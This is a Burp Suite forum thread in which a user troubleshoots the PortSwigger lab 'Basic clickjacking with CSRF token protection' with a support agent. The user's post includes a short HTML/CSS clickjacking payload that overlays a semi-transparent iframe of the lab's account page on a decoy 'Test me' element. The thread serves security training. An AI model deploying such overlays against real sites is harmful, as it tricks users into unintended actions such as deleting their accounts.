
Burp Suite User Forum

"Basic clickjacking with CSRF token protection" lab error

Viktor | Last updated: Aug 25, 2024 10:23AM UTC

When I try to embed the iframe of the page with the delete account button, my session is not included in the iframe. Instead of showing the myaccount page, it shows the login page.

Ben, PortSwigger Agent | Last updated: Aug 26, 2024 07:14AM UTC

Hi Viktor, are you able to provide us with details of what your exploit looks like? In addition, I assume that you have logged into the wiener/peter user account before you configure the exploit? Finally, what version of Burp are you using?

Viktor | Last updated: Aug 26, 2024 01:42PM UTC

I logged in as wiener, then used the following exploit and clicked "view exploit":

```html
<style>
    iframe {
        position:relative;
        width: 500px;
        height: 700px;
        opacity: 0.2;
        z-index: 2;
    }
    div {
        position:absolute;
        top: 300px;
        left: 60px;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe src="https://0a4800630314c9f8812c9d6f0084003f.web-security-academy.net/my-account"></iframe>
```

The iframe doesn't load the session, and I am greeted by the login page. I didn't need to use Burp for this particular lab.

Ben, PortSwigger Agent | Last updated: Aug 27, 2024 07:26AM UTC

Hi Viktor, what browser are you using when you attempt this particular lab? If you are using the embedded browser, can you confirm which version of Burp you are using?
